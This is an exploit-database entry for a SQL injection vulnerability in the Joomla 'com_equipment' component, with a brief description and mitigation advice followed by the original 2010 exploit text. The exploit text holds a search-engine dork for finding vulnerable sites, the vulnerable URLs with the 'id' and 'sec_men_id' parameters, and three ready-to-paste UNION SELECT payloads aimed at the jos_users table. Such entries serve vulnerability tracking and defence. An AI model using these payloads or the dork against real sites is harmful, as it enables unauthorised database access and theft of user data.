header-logo
Suggest Exploit
vendor:
com_equipment
by:
Forza-Dz
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_equipment
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win Sp2 and Mac
2010

Joomla “com_equipment” Sql Injection Vulnerability

The component "com_equipment" is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter. The vulnerable parameter is "id" and "sec_men_id" in the URL. The malicious SQL query can be sent using the "Union" operator.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

# Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability  
# Date : 16 - 8 - 2010  
# Author : Forza-Dz 
# Vendor : http://joomlaequipment.com/ 
# Version : All Versions  
# Tested on : Win Sp2 and Mac 
############################################################ 
Dork = inurl:"com_equipment" 
############################################################ 
--- SQL Injection Vulenrability ---  
SQL Injection Vulenrability component "com_equipment" 
############################################################
===[ Exploit ]=== 
http://www.site.com/path/index.php?option=com_equipment&view=details&id=[SQL] 
or
http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[SQL] 
############################################################ 
===[Injection]=== 
[SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[SQL] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users-- 
[SQL] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
############################################################ 
Greetz @ MCA-CRB All "DZ" "MusliM"  
############################################################ 
        ======[saha fotorkom]====== 
############################################################